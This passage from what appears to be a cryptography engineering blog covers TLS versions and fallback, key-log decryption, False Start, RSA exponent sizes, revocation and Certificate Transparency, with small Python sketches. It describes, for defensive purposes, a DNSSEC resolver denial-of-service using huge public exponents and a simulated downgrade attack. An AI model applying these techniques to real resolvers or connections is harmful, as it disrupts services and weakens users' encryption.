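ctx = forward_secret_server_context()
for cipher in ctx.get_ciphers():
    print(cipher["name"])
```

A real deployment would also load a certificate and key with load_cert_chain; that is left out here because it needs files on disk.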

I'm not going to take the time to detail how to configure this here. There are lots of webservers and it would take a while. This is more of a pointer so that you can go away and research it if you wish.

(The rest of the talk touched on OpenSSL speed, public key pinning, TLS 1.1 and 1.2 and a few other matters, but I did those bits mostly on the fly and don't have notes for them.)

Decrypting SSL packet dumps

We all love transport security but it can get in the way of a good tcpdump. Unencrypted protocols like HTTP, DNS etc can be picked apart for debugging but anything running over SSL can be impenetrable. Of course, that's an advantage too: the end-to-end principle is dead for any common, unencrypted protocol. But we want to have our cake and eat it.

Wireshark (a common tool for dissecting packet dumps) has long had the ability to decrypt some SSL connections given the private key of the server, but the private key isn't always something that you can get hold of, or want to spread around. MITM proxies (like Fiddler) can sit in the middle of a connection and produce plaintext, but they also alter the connection: SPDY, client-certificates etc won't work through them (at least not without special support).

So here's another option: if you get a dev channel release of Chrome and a trunk build of Wireshark you can run Chrome with the environment variable SSLKEYLOGFILE set to, say, /home/foo/keylog. Then, in Wireshark's preferences for SSL, you can tell it about that key log file. As Chrome makes SSL connections, it'll dump an identifier and the connection key to that file and Wireshark can read those and decrypt SSL connections.

The format of the key log file is described here. There's an older format just for RSA ciphersuites that I added when Wireshark decrypted purely based on RSA pre-master secrets. However, that doesn't work with ECDHE ciphersuites (amongst others) so the newer format can be used to decrypt any connection. (You need the trunk build of Wireshark to support the newer format.) Chrome currently writes records of both formats.
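To give a feel for the file, here is a small parser sketch. It assumes each record is a line of three space-separated fields (a label, a hex identifier and a hex secret), with RSA as the label of the older format and CLIENT_RANDOM as the label of the newer one. That is my understanding of the NSS format rather than something spelled out in this post, so treat the linked description as authoritative. The sample values are obviously fake.

```python
def parse_keylog(text):
    """Parse key log lines into (label, identifier, secret) tuples."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # skip blank lines and comments
        parts = line.split()
        if len(parts) != 3:
            continue  # not a record we understand
        label, identifier, secret = parts
        try:
            entries.append((label, bytes.fromhex(identifier), bytes.fromhex(secret)))
        except ValueError:
            continue  # ignore lines with malformed hex
    return entries


# Fake record: a 32-byte client random and a 48-byte master secret.
SAMPLE = "# made-up example\nCLIENT_RANDOM " + "11" * 32 + " " + "22" * 48 + "\n"

for label, identifier, secret in parse_keylog(SAMPLE):
    print(label, len(identifier), len(secret))
```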

This can also be coupled with spdy-shark to dissect SPDY connections.

Since key log support is part of NSS, support will hopefully end up in Firefox in the future.

New TLS versions

TLS is the protocol behind most secure connections on the Internet and most TLS is TLS 1.0, despite the fact that the RFC for 1.0 was published in January 1999, over 13 years ago.

Since then there have been two newer versions of TLS: 1.1 (2006) and 1.2 (2008). TLS 1.1 added an explicit IV for CBC mode ciphers as a response to CBC weaknesses that eventually turned into the BEAST attack. TLS 1.2 changes the previous MD5/SHA1 combination hash to use SHA256 and introduces AEAD ciphers like AES-GCM.

However, neither of these versions saw any significant adoption for a long time because TLS's extension mechanism allowed 1.0 to adapt to new needs.

But things are starting to change:

  • Google servers now support up to TLS 1.2.
  • iOS 5 clients support up to TLS 1.2.
  • Chrome dev channel supports up to TLS 1.1.
  • Twitter, Facebook and Cloudflare appear to be deploying TLS 1.2 support, although the nature of large deployments means that this may vary during a gradual deployment.
  • Opera supports up to TLS 1.2, although I believe that 1.1 and 1.2 are disabled by default.

In the long run, getting to 1.2 is worthwhile. The MD5/SHA1 hash combination used in previous versions was hoped to be more secure than either hash function alone, but [1] suggests that it's probably only as secure as SHA1. Also, the GCM cipher modes allow AES to be used without the problems (and space overhead) of CBC mode. GCM is hardware accelerated in recent Intel and AMD chips along with AES itself.

But there are always realities to contend with I'm afraid:

Firstly, there's the usual problem of buggy servers. TLS has a version negotiation mechanism, but some servers will fail if a client indicates that it supports the newer TLS versions. (Last year, Yngve Pettersen suggested that 2% of HTTPS servers failed if the client indicated TLS 1.1 and 3% for TLS 1.2.)

Because of this Chrome implements a fallback from TLS 1.1 to TLS 1.0 if the server sends a TLS error. (And we have a fallback from TLS 1.0 to SSL 3.0 if we get another TLS error on the second try.) This, sadly, means that supporting TLS 1.1 cannot bring any security benefits because an attacker can cause us to fall back. Thankfully, the major security benefit of TLS 1.1, the explicit CBC IVs, was retrofitted to previous versions in the form of 1/n-1 record splitting after the BEAST demonstration.
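The problem can be shown with a toy model. This is a simulation only, not Chrome's code: errors_on stands for the set of offered versions that end in a TLS error, and the client has no way to tell whether a buggy server or an attacker caused them.

```python
# Versions the simulated client tries, newest first.
CLIENT_ORDER = ["TLS 1.1", "TLS 1.0", "SSL 3.0"]
RANK = {"SSL 3.0": 0, "TLS 1.0": 1, "TLS 1.1": 2}


def connect_with_fallback(server_max, errors_on=frozenset()):
    """Return the negotiated version, retrying with older offers on error."""
    for offered in CLIENT_ORDER:
        if offered in errors_on:
            continue  # handshake failed, so fall back and try again
        # Normal negotiation: the older of the client's offer and the
        # newest version that the server supports.
        return min(offered, server_max, key=RANK.__getitem__)
    return None  # every attempt failed


print(connect_with_fallback("TLS 1.1"))
print(connect_with_fallback("TLS 1.1", errors_on={"TLS 1.1", "TLS 1.0"}))
```

In the second call both ends support TLS 1.1, yet two forged errors are enough to push the connection down to SSL 3.0.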

Since these fallbacks can be a security concern (especially the fallback to SSLv3, which eliminates ECDHE forward secrecy) I fear that it's necessary to add a second, redundant version negotiation mechanism to the protocol. It's an idea which has been floated before and I raised it again recently.

But buggy servers are something that we've known about for many years. Deploying new TLS versions has introduced a new problem: buggy networks.

Appallingly it appears that there are several types of network device that manage to break when confronted with new TLS versions. There are some that break any attempt to offer TLS 1.1 or 1.2, and some that break any connections that negotiate these versions. These failures, so far, manifest in the form of TCP resets, which isn't currently a trigger for Chrome to fall back, although we may be forced to add it.

Chrome dev or iOS users suffering from the first type of device see all of their HTTPS connections fail. Users suffering the second type only see failures when connecting to sites that support TLS 1.1 or 1.2. (Which includes Google.) iOS leaves it up to the application to implement fallback if they wish and adding TLS 1.2 support to Google's servers has caused some problems because of these bad networks.

We're working to track down the vendors with issues at the moment and to make sure that updates are available, and that they inform their customers of this. I'm very interested in any cases where Chrome 21 suddenly caused all or some HTTPS connections to fail with ERR_CONNECTION_RESET. If you hit this, please let me know (agl at chromium dot org).

([1] Antoine Joux, Multicollisions in Iterated Hash Functions: Application to Cascaded Constructions, CRYPTO (Matthew K. Franklin, ed.), Lecture Notes in Computer Science, vol. 3152, Springer, 2004, pp. 306–316.)

False Start's Failure

Eighteen months ago(ish), Chrome started using False Start. False Start reduces the average time for an SSL handshake by 30%.

Since the biggest problem with transport security is that most sites don't use it, anything that reduces the latency impact of HTTPS is important. Making things faster doesn't just make them faster, it also makes them cheaper and more prevalent. When HTTPS is faster, it'll be used in more places than it would otherwise be.

But, sadly, False Start will be disabled, except for sites doing NPN, in Chrome 20. NPN is a TLS extension that we use to negotiate SPDY, although you don't have to use it for SPDY: you can advertise http/1.1 if you wish.

False Start was known to cause problems with a very small number of servers and the initial announcement outlined the uncommon scheme that we used to deploy it: we scanned the public Internet and built up a list of problematic sites. That list was built into Chrome and we didn't use False Start for connections to those sites. Over time the list was randomly eroded away and I'd try to address any issues that came up. (Preemptively so in the case of large sites.)

It did work to some extent. Many sites that had problems were fixed and it's a deployment scheme that is worth considering in the future. But it didn't ultimately work well enough for False Start.

Initially we believed that False Start issues were deterministic so long as the TLS Finished and application data records were sent in the same TCP packet. We changed Chrome to do this in the hopes of making False Start issues deterministic. However, we later discovered some HTTPS servers that were still non-deterministically False Start intolerant. I hypothesise that the servers run two threads per connection: one for reading and one for writing. Although the TCP packet was received atomically, thread scheduling could mean that the read thread may or may not be scheduled before the write thread had updated the connection state in response to the Finished.

This non-determinism made False Start intolerance difficult to diagnose and reduced our confidence in the blacklist.

The 'servers' with problems were nearly always SSL terminators. These hardware devices terminate SSL connections and proxy unencrypted data to backend HTTP servers. I believe that False Start intolerance is very simple to fix in the code and one vendor suggested that was the case. None the less, of the vendors who did issue an update, most failed to communicate that fact to their customers. (A pattern that has repeated with the BEAST fix.)

One, fairly major, SSL terminator vendor refused to update to fix their False Start intolerance despite problems that their customers were having. I don't believe that this was done in bad faith, but rather a case of something much more mundane along the lines of “the SSL guy left and nobody touches that code any more”. However, it did mean that there was no good answer for their customers who were experiencing problems.

Lastly, it was becoming increasingly clear that we had a bigger problem internationally. Foreign admins have problems finding information on the subject (which is mostly in English) and foreign users have problems reporting bugs because we can't read them. We do have excellent agents in countries who liaise locally but it was still a big issue, and we don't cover every country with them. I also suspect that the distribution of problematic SSL terminators is substantially larger in some countries and that the experience with the US and Europe caused us to underestimate the problem.

In aggregate this led us to decide that False Start was causing more problems than it was worth. We will now limit it to sites that support the NPN extension. This unfortunately means that it'll be an arcane, unused optimisation for the most part: at least until SPDY takes over the world.

Very large RSA public exponents

After yesterday's post that advocated using RSA public exponents of 3 or 2^16+1 in DNSSEC for performance, Dan Kaminsky asked me whether there was a potential DoS vector by using really big public exponents.

Recall that the RSA signature verification core is m^e mod n. By making e and n larger, we can make the operation slower. But there are limits, at least in OpenSSL:

/* for large moduli, enforce exponent limit */
if (BN_num_bits(rsa->n) > OPENSSL_RSA_SMALL_MODULUS_BITS) {
        if (BN_num_bits(rsa->e) > OPENSSL_RSA_MAX_PUBEXP_BITS) {
                RSAerr(RSA_F_RSA_EAY_PUBLIC_ENCRYPT, RSA_R_BAD_E_VALUE);
                return -1;
        }
}

So, if n is large, we enforce a limit on e. The values of the #defines are such that for n>3072 bits, e must be less than or equal to 64 bits. So the slowest operations happen with an n and e of 3072 bits. (The fact that e<n is enforced earlier in the code.)
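The same rule, restated as a Python sketch for anyone who wants to play with it. The two constants are set to the values described above (3072 and 64 bits). The test integers are picked only for their bit lengths and are not real RSA keys.

```python
# Limits as described in the text; names mirror the OpenSSL #defines.
OPENSSL_RSA_SMALL_MODULUS_BITS = 3072
OPENSSL_RSA_MAX_PUBEXP_BITS = 64


def public_exponent_allowed(n, e):
    """Mimic the size checks: e < n, and a small e once n is large."""
    if e >= n:
        return False  # e < n is enforced earlier in the real code
    if (n.bit_length() > OPENSSL_RSA_SMALL_MODULUS_BITS
            and e.bit_length() > OPENSSL_RSA_MAX_PUBEXP_BITS):
        return False  # large modulus with an oversized exponent
    return True


n_3072 = (1 << 3072) - 1        # a 3072-bit number
n_4096 = (1 << 4095) + 1        # a 4096-bit number
print(public_exponent_allowed(n_3072, (1 << 3071) + 1))  # 3072-bit e
print(public_exponent_allowed(n_4096, (1 << 64) + 1))    # 65-bit e
print(public_exponent_allowed(n_4096, 65537))
```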

So I set up *.bige.imperialviolet.org. This is a perfectly valid and well signed zone which happens to use a 3072-bit key with a 3072-bit public exponent. (I could probably have slowed things down more by picking a public exponent with lots of 1s in its binary representation, but it's just a random number in this case.) One can resolve records 1.bige.imperialviolet.org, 2.bige.imperialviolet.org, … and the server doesn't have to sign anything because it's a wildcard: a single signature covers all of the names. However, the resolver validates the signature every time.

On my 2.66GHz, Core 2 laptop, 15 requests per second causes unbound to take 95% of a core. A couple hundred queries per second would probably put most DNSSEC resolvers in serious trouble.

So I'd recommend limiting the public exponent size in DNSSEC to 2^16+1, except that people are already mistakenly using 2^32+1, so I guess that needs to be the limit. The DNSSEC spec limits the modulus size to 4096-bits, and 4096-bit signatures are about 13 times slower to verify than the typical 1024-bit signatures used in DNSSEC. But that's a lot less of a DoS vector than bige.imperialviolet.org, which is 2230 times slower than normal.

RSA public exponent size

RSA public operations are much faster than private operations. Thirty-two times faster for a 2048-bit key on my machine. But the two operations are basically the same: take the message, raise it to the power of the public or private exponent and reduce modulo the key's modulus.

What makes the public operations so much faster is that the public exponent is typically tiny, while the private exponent should be the same size as the modulus. One can actually use a public exponent of three in RSA, and clearly cubing a number should be faster than raising it to the power of a 2048-bit number.
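A textbook square-and-multiply loop makes the cost difference concrete. This is a sketch for counting operations, not how a real library does it (they use windowing and other tricks), and the base and modulus below are toy values.

```python
def modexp_counting(m, e, n):
    """Left-to-right square-and-multiply; returns (result, squarings, multiplies).

    Requires e >= 1.
    """
    bits = bin(e)[3:]      # binary digits of e after the leading 1
    result = m % n         # accounts for the leading 1 bit
    squarings = multiplies = 0
    for bit in bits:
        result = (result * result) % n
        squarings += 1
        if bit == "1":
            result = (result * m) % n
            multiplies += 1
    return result, squarings, multiplies


N = 1000003  # toy modulus, far too small for real RSA
for name, e in (("3", 3), ("2^16+1", 2**16 + 1),
                ("2^32+1", 2**32 + 1), ("2^127-1", 2**127 - 1)):
    result, sq, mul = modexp_counting(5, e, N)
    assert result == pow(5, e, N)  # agrees with Python's built-in modexp
    print(name, "squarings:", sq, "multiplies:", mul)
```

The squarings track the bit length of the exponent and the multiplies track the number of 1 bits, which is why an exponent like 2^16+1 is cheap and a full-size private exponent is not.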

In 2006, Daniel Bleichenbacher (a fellow Googler) gave a talk at the CRYPTO 2006 rump session where he outlined a bug in several, very common RSA signature verification implementations at the time. The bug wasn't nearly as bad as it could have been because it only affected public keys that used a public exponent of three and most keys used a larger exponent: 2^16+1. But the fact that a slightly larger public exponent saved these buggy verifiers cemented 2^16+1 as a sensible default value for the public exponent.

But there's absolutely no reason to think that a public exponent larger than 2^16+1 does any good. I even checked that with Bleichenbacher before writing this. Three should be fine, 2^16+1 saved some buggy software a couple of times and any larger is probably a mistake.

Because of that, when writing the Go RSA package, I didn't bother supporting public exponents larger than 2^31-1. But then several people reported that they couldn't verify some DNSSEC signatures. Sure enough, the DNSKEY records for .cz and .us are using a public exponent of 2^32+1.

DNSSEC is absolutely the last place to use large, public exponents. Busy DNS resolvers have to resolve tens or hundreds of thousands of records a second; fast RSA signature verification is a big deal in DNSSEC. So I measured the speed impact of various public exponent sizes with OpenSSL (1.0.1-beta3):

Public exponent    Verification time (µs)
3                  10.6
2^16+1             23.9
2^32+1             42.7
2^127-1            160.7

So a public exponent of 2^32+1 makes signature verification over four times slower than an exponent of three. As DNSSEC grows, and DNSSEC resolvers too, that extra CPU time is going to be a big deal.

It looks like the zones using a value of 2^32+1 are just passing the -e flag to BIND's dnssec-keygen utility. There's some suggestion that -e used to select 2^16+1 but silently changed semantics in some release.

So today's lesson is don't pass -e to dnssec-keygen! The default of dnssec-keygen is 2^16+1 and that's certainly safe. The .com zone uses a value of three and I think that's probably the best choice given the CPU cost and the fact that the original Bleichenbacher bug has been long since fixed.

Forward secrecy for IE and Safari too

When we announced forward secrecy for Google HTTPS we noted that “we hope to support IE in the future”. It wasn't that we didn't want to support IE, but IE doesn't implement the combination of ECDHE with RC4. IE (or rather, SChannel) does implement ECDHE with AES on Vista and Windows 7, but I only wanted to make one change at a time.

With the release of MS12-006 a month ago to address the BEAST weakness in TLS 1.0's CBC design, we've now made ECDHE-RSA-AES128-SHA our second preference cipher. That means that Chrome and Firefox will still use ECDHE-RSA-RC4-SHA, but IE on Vista and Windows 7 will get ECDHE now. This change also means that we support ECDHE with Safari (at least on Lion, where I tried it.)

RSA 2012

Just a brief note that I'll be at RSA 2012 in San Francisco at the end of the month and will be speaking with several others about certificate revocation. (tech-106, Tuesday, 1pm.)

If you want to chat and don't manage to grab me then, drop me an email. (agl at imperialviolet.org if you didn't already know.)

Revocation checking and Chrome's CRL

When a browser connects to an HTTPS site it receives signed certificates which allow it to verify that it's really connecting to the domain that it should be connecting to. In those certificates are pointers to services, run by the Certificate Authorities (CAs) that issued the certificate, that allow the browser to get up-to-date information.

All the major desktop browsers will contact those services to inquire whether the certificate has been revoked. There are two protocols/formats involved: OCSP and CRL, although the differences aren't relevant here. I mention them only so that readers can recognise the terms in other discussions.

The problem with these checks, that we call online revocation checks, is that the browser can't be sure that it can reach the CA's servers. There are lots of cases where it's not possible: captive portals are one. A captive portal frequently requires you to sign in on an HTTPS site, but blocks traffic to all other sites, including the CA's OCSP servers.

If browsers were to insist on talking to the CA before accepting a certificate, all these cases would stop working. There's also the concern that the CA may experience downtime and it's bad engineering practice to build in single points of failure.

Therefore online revocation checks which result in a network error are effectively ignored (this is called “soft-fail”). I've previously documented the resulting behaviour of several browsers.

But an attacker who can intercept HTTPS connections can also make online revocation checks appear to fail and so bypass the revocation checks! In cases where the attacker can only intercept a subset of a victim's traffic (i.e. the SSL traffic but not the revocation checks), the attacker is likely to be a backbone provider capable of DNS or BGP poisoning to block the revocation checks too.

If the attacker is close to the server then online revocation checks can be effective, but an attacker close to the server can get certificates issued from many CAs and deploy different certificates as needed. In short, even revocation checks don't stop this from being a real mess.

So soft-fail revocation checks are like a seat-belt that snaps when you crash. Even though it works 99% of the time, it's worthless because it only works when you don't need it.
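The seat-belt problem fits in a few lines. This is a toy model with invented names, not any browser's logic: check_revocation stands for the online lookup, and NetworkError for any failure to reach the CA.

```python
class NetworkError(Exception):
    """Raised when the CA's revocation service can't be reached."""


def accept_certificate(check_revocation, hard_fail=False):
    """Decide whether to accept a certificate given an online check."""
    try:
        revoked = check_revocation()
    except NetworkError:
        # Soft-fail: a failed lookup is treated as "not revoked".
        return not hard_fail
    return not revoked


def honest_check():
    return True  # the CA says: this certificate is revoked


def blocked_check():
    raise NetworkError("attacker dropped the request")


print(accept_certificate(honest_check))                   # check got through
print(accept_certificate(blocked_check))                  # soft-fail
print(accept_certificate(blocked_check, hard_fail=True))  # hard-fail
```

With soft-fail, the revoked certificate is rejected only when the attacker lets the check through. Hard-fail closes that hole but breaks captive portals and makes the CA a single point of failure.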

While the benefits of online revocation checking are hard to find, the costs are clear: online revocation checks are slow and compromise privacy. The median time for a successful OCSP check is ~300ms and the mean is nearly a second. This delays page loading and discourages sites from using HTTPS. They are also a privacy concern because the CA learns the IP address of users and which sites they're visiting.

On this basis, we're currently planning on disabling online revocation checks in a future version of Chrome. (There is a class of higher-security certificate, called an EV certificate, where we haven't made a decision about what to do yet.)

Pushing a revocation list

Our current method of revoking certificates in response to major incidents is to push a software update. Microsoft, Opera and Firefox also push software updates for serious incidents rather than rely on online revocation checks. But our software updates require that users restart their browser before they take effect, so we would like a lighter weight method of revoking certificates.

So Chrome will start to reuse its existing update mechanism to maintain a list of revoked certificates, as first proposed to the CA/Browser Forum by Chris Bailey and Kirk Hall of AffirmTrust last April. This list can take effect without having to restart the browser.

An attacker can still block updates, but they have to be able to maintain the block constantly, from the time of revocation, to prevent the update. This is much harder than blocking an online revocation check, where the attacker only has to block the checks during the attack.

Since we're pushing a list of revoked certificates anyway, we would like to invite CAs to contribute their revoked certificates (CRLs) to the list. We have to be mindful of size, but the vast majority of revocations happen for purely administrative reasons and can be excluded. So, if we can get the details of the more important revocations, we can improve user security. Our criteria for including revocations are:

  1. The CRL must be crawlable: we must be able to fetch it over HTTP and robots.txt must not exclude GoogleBot.
  2. The CRL must be valid by RFC 5280 and none of the serial numbers may be negative.
  3. CRLs that cover EV certificates are taken in preference, while still considering point (4).
  4. CRLs that include revocation reasons can be filtered to take less space and are preferred.

For the curious, there is a tool for fetching and parsing Chrome's list of revoked certificates at https://github.com/agl/crlset-tools.

Extracting Mozilla's Root Certificates

When people need a list of root certificates, they often turn to Mozilla's. However, Mozilla doesn't produce a nice list of PEM encoded certificates. Rather, they keep them in a form which is convenient for NSS to build from: https://mxr.mozilla.org/mozilla/source/security/nss/lib/ckfw/builtins/certdata.txt?raw=1.

Several people have written quick scripts to try and convert this into PEM format, but they often miss something critical: some certificates are explicitly distrusted. These include the DigiNotar certificates and the misissued COMODO certificates. If you don't parse the trust records from the NSS data file, then you end up trusting these too! There's at least one, major example of this that I know of.

(Even with a correct root file, unless you do hard fail revocation checking you're still vulnerable to the misissued COMODO certificates.)
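To illustrate the mistake, here is a sketch that reads trust records from a heavily simplified imitation of the NSS file. The attribute and value names are written from my recollection of certdata.txt and should be checked against the real file. The labels are invented, and pairing trust records to certificates by label alone is a shortcut for this example.

```python
# A simplified, made-up excerpt in the style of certdata.txt trust objects.
SAMPLE = '''\
CKA_CLASS CK_OBJECT_CLASS CKO_NSS_TRUST
CKA_LABEL UTF8 "Example Trusted Root"
CKA_TRUST_SERVER_AUTH CK_TRUST CKT_NSS_TRUSTED_DELEGATOR

CKA_CLASS CK_OBJECT_CLASS CKO_NSS_TRUST
CKA_LABEL UTF8 "Example Distrusted Root"
CKA_TRUST_SERVER_AUTH CK_TRUST CKT_NSS_NOT_TRUSTED
'''


def server_auth_trust(text):
    """Map each object's label to its server-auth trust value."""
    trust = {}
    label = None
    for line in text.splitlines():
        fields = line.split(None, 2)
        if len(fields) < 3:
            continue
        attr, _type, value = fields
        if attr == "CKA_CLASS":
            label = None  # a new object starts here
        elif attr == "CKA_LABEL":
            label = value.strip('"')
        elif attr == "CKA_TRUST_SERVER_AUTH" and label is not None:
            trust[label] = value
    return trust


def trusted_roots(text):
    """Labels that are explicitly trusted to issue server certificates."""
    return sorted(label for label, value in server_auth_trust(text).items()
                  if value == "CKT_NSS_TRUSTED_DELEGATOR")


print(trusted_roots(SAMPLE))
```

A script that only extracts the certificates and never looks at these records would emit both roots.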

So, at the prodding of Denton Gentry, I've open-sourced a tool for converting NSS's file to PEM format: extract-nss-root-certs. (At the time of writing it requires a 6g built from the weekly or current tree (hg -r weekly), not the release tree. A few of the APIs have changed since the last Go release was done. This will be resolved when Go 1.0 is released.)

BEAST followup

(See the original post for background.)

Everyone seems to have settled on 1/n-1 record splitting as a workaround for the BEAST attack in TLS 1.0 and SSLv3. Briefly: 1/n-1 record splitting breaks CBC encrypted records in two: the first with only a single byte of application data and the second with the rest. This effectively randomises the IV and stops the attack.

The workaround which OpenSSL tried many years ago, and which hit significant issues, was 0/n record splitting. It's the same thing, but with the first record being empty. The problem with it was that many stacks processed the empty record and returned a 0-byte read, which higher levels took to mean EOF.

1/n-1 record splitting doesn't hit that problem, but it turns out that there's a fair amount of code out there that assumes that the entire HTTP request comes in a single read. The single byte record breaks that.
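The two splitting schemes, sketched on plaintext only. Real stacks do this at the record layer just before CBC encryption; the function names here are made up.

```python
def split_1_n_minus_1(data):
    """Split application data into a 1-byte record and the remainder."""
    if len(data) <= 1:
        return [data]  # nothing to split
    return [data[:1], data[1:]]


def split_0_n(data):
    """The older workaround: an empty record followed by the full data."""
    return [b"", data]


request = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"

# A peer that treats the first 0-byte read as EOF gives up here.
print(split_0_n(request)[0] == b"")

# A peer that assumes the whole request arrives in one read sees only b"G".
print(split_1_n_minus_1(request)[0])
```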

We first implemented 1/n-1 record splitting in Chrome 15 but backed off after only a couple of days because logging into several large sites broke. But that did motivate the sites to fix things so that we could switch it on in Chrome 16 and it stuck that time.

Opera also implemented it around this time, but I think Chrome took the brunt of the bug reports and it's time consuming dealing with them. Myself and a colleague have been emailing and phoning a lot of sites and vendors while dealing with upset users and site admins. Chrome certainly paid a price for moving before Firefox and IE but then we're nice like that.

Thankfully, this week, Microsoft released a security update which implements 1/n-1 record splitting in SChannel and switches it on in IE. (Although it defaults to off for other users of SChannel, unlike NSS.) Now the sites which broke with Chrome 16 are also broken in a patched IE and that takes some pressure off us. In a few weeks, Firefox 10 should be released and then we'll be about as good as we're going to get.

After taking the brunt with Chrome 16, there is one case that I'm not going to fight: Plesk can't handle POST payloads that don't come in a single read. Chrome (currently) sends POSTs as two writes: one for the HTTP headers and a second for the POST body. That means that each write is split into two records and Plesk breaks because of the second split. IE and Firefox send the headers and body in a single write, so there's only a single split in the HTTP headers, which Plesk handles.

Chrome will start merging small POST bodies into the headers with Chrome 17 (hopefully) and this will fix Plesk. Also, merging as Firefox and IE do saves an extra packet so it's worthwhile on its own. Once again, anything that's mostly true soon becomes an unwritten rule on the Internet.

It's worth contrasting the BEAST response to the renegotiation attack. The BEAST workaround caused a number of problems, but it worked fine for the vast majority of sites. The renegotiation fix requires that very nearly every HTTPS site on the Internet be updated and then that browsers refuse to talk to unpatched servers.

I'd bet that we'll not manage to get enough patched servers for any browser to require it this side of 2020. Unpatched servers can still disable renegotiation to protect themselves, but it's still not hard to find major sites that allow insecure renegotiation (www.chase.com was literally the second site that I tried).

OTR in Go

“Off the record” is, unfortunately, an overloaded term. To many it's a feature in gTalk and AOL IM which indicates that the conversation isn't logged. However, to crypto folks it's a protocol for secure chat.

(In fact, resolving the ambiguity is on the EFF's wish list.)

Pidgin has been my chat client of choice for some time because it's pretty fully featured and supports OTR via a plugin. However, I just don't trust it from a security point of view. The latest incident was only a couple of weeks ago: CVE-2011-3919.

So, I implemented otr in Go, as well as an XMPP library and client. It's an absolutely minimal client (except for OTR support) and implements only what I absolutely need in a client.

But it does mean that the whole stack, including the TLS library, is implemented in a memory safe language. (On the other hand, pretty much everything in that stack, from the modexp function to the terminal handling code was written by me and has never really been audited. I'm a decent programmer but I'm sure there are some howlers of security issues in there somewhere.)

Certificate Transparency

(I don't have comments on this blog, but you can comment on my Google+ post.)

Ben Laurie and I have been working on a longer term plan for improving the foundations of the certificate infrastructure on which most Internet transport security is based these days. Although Chrome has public key pinning for some domains, which limits the set of permitted certificates, we don't see public key pinning as a long term solution (and nor was it ever designed to be).

For the 10 second summary of the plan, I'll quote Ben: “certificates are registered in a public audit log. Servers present proofs that their certificate is registered, along with the certificate itself. Clients check these proofs and domain owners monitor the logs.” I would add only that anyone can check the logs: the certificate infrastructure would be fully transparent.

We now have an outline of the basic idea and will be continuing to flesh it out in the coming months, hopefully in conjunction with other browser vendors.

But I thought that, at the outset, it would be helpful to describe some of the limitations to the design space, as I see them:

No side-channels

As I've previously described, side-channels occur when a browser needs to contact a server other than the immediate destination in order to verify a certificate. Revocation checking with OCSP is an example of a side-channel used today.

But in order to be effective, side-channels invariably need to block the certificate verification until they complete, and that's a big problem. The Internet isn't fully connected. Captive portals, proxies and firewalls all mean that the only thing you can really depend on talking to is the immediate destination server. Because of this, browsers have never been able to make OCSP lookups blocking, and therefore OCSP is basically useless for security.

And that's not to mention the privacy, performance and functionality issues that arise from needing side-channels. (What happens when the side-channel server goes down?)

So our design requires that the servers send us the information that we require. We can use side-channels to check up on the logs, but it's an asynchronous lookup.

It's not opt-in, it's all-in

SSL Stripping is a very easy and very effective attack. HSTS prevents it and is as easy to deploy as anything can be for HTTPS sites. But, despite all this, and despite a significant amount of evangelism, take up has been very limited, even by sites which are HTTPS only and the subject of attacks.

While HSTS really has to be opt-in, a solution to the certificate problem doesn't. Although our scheme is incrementally deployable, the eventual aim is that it's required for everybody. Thankfully, since certificates have to be renewed there's an obvious means to incrementally deploy it: require it for certificates issued after a certain date. Although an eventual hard requirement is still needed, it's a lot less of a problem.

It's easy on the server operator

Since the aim is to make it a requirement for all servers, we've sacrificed a lot in order to make it very easy on the server operator. For most server operators, their CA will probably take care of fetching the audit proofs, meaning there's no additional work at all.

Some initial designs included short-lived log signatures, which would have solved the revocation problem. (Revocation would simply be a matter of instructing the logs to stop signing a given certificate.) However, this would have required server operators to update their audit proofs on a near-daily basis. After discussions it became clear that such a requirement wouldn't be tenable for many and so we reluctantly dropped it.

We are also sacrificing decentralisation to make things easy on the server. As I've previously argued, decentralisation isn't all it's cracked up to be in most cases because 99.99% of people will never change any default settings, so we haven't given up much. Our design does imply a central set of trusted logs which is universally agreed. This saves the server from possibly having to fetch additional audit proofs at runtime, something which requires server code changes and possible network changes.

There are more valid certificates than the one that's currently serving

Cheap virtual hosting and EC2 have made multi-homed services common. Even small to medium scale sites have multiple servers these days. So any scheme that asserts that the currently serving certificate is the only valid certificate will run into problems when certificates change. Unless all the servers are updated at exactly the same time, then users will see errors during the switch. These schemes also make testing a certificate with a small number of users impossible.

In the end, the only real authority on whether a certificate is valid is the site itself. So we don't rely on external observations to decide whether a certificate is valid; instead we seek to make the set of valid certificates for a site public knowledge (which it currently isn't), so that the site can determine whether it's correct.

It's not easy to do

We believe that this design will have a significant, positive impact on an important part of Internet security and that it's deployable. We also believe that any design that shares those two properties ends up looking a lot like it. (It's no coincidence that we share several ideas with the EFF's Sovereign Keys.)

None the less, deployment won't be easy and, hopefully, we won't be pushing it alone.

Forward secrecy for Google HTTPS

As announced on the Google Security Blog, Google HTTPS sites now support forward secrecy. What this means in practice is two things:

Firstly, the preferred cipher suite for most Google HTTPS servers is ECDHE-RSA-RC4-SHA. If you have a client that supports it, you'll be using that cipher suite. Chrome and Firefox, at least, support it.

Previously we were using RSA-RC4-SHA, which means that the client (i.e. browser) picks a random key for the session, encrypts it with the server's public key and sends it to the server. Since only the holder of the private key can decrypt the session key, the connection is secure.

However, if an attacker obtains the private key in the future then they can decrypt recorded traffic. The encrypted session key can be decrypted just as well in ten years' time as it can be decrypted today and, in ten years' time, the attacker will have much more computing power to break the server's public key. If an attacker obtains the private key, they can decrypt everything encrypted to it, which could be many months of traffic.

ECDHE-RSA-RC4-SHA means elliptic curve, ephemeral Diffie-Hellman, signed by an RSA key. You can see a previous post about elliptic curves for an introduction, but the use of elliptic curves is an implementation detail.

Ephemeral Diffie-Hellman means that the server generates a new Diffie-Hellman public key for each session and signs the public key. The client also generates a public key and, thanks to the magic of Diffie-Hellman, they both derive a shared key that no eavesdropper can know.

The important part here is that there's a different public key for each session. If the attacker breaks a single public key then they can decrypt only a single session. Also, the elliptic curve that we're using (P-256) is estimated to be as strong as a 3248-bit RSA key (by ECRYPT II), so it's unlikely that the attacker will ever be able to break a single instance of it without a large, quantum computer.
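To make the per-session property concrete, here is a minimal sketch of an ephemeral Diffie-Hellman exchange. It is an illustration under loud assumptions: it uses a toy finite-field group (the prime `P` and generator `G` are chosen for brevity, not security) rather than P-256, and it omits the RSA signature over the server's public key.

```python
import secrets

# Toy group for illustration only: 2**127 - 1 is prime, but this is NOT a
# secure choice. Real deployments use standardised curves such as P-256.
P = 2**127 - 1
G = 3

def ephemeral_keypair():
    """Generate a fresh (private, public) pair that is used for one session only."""
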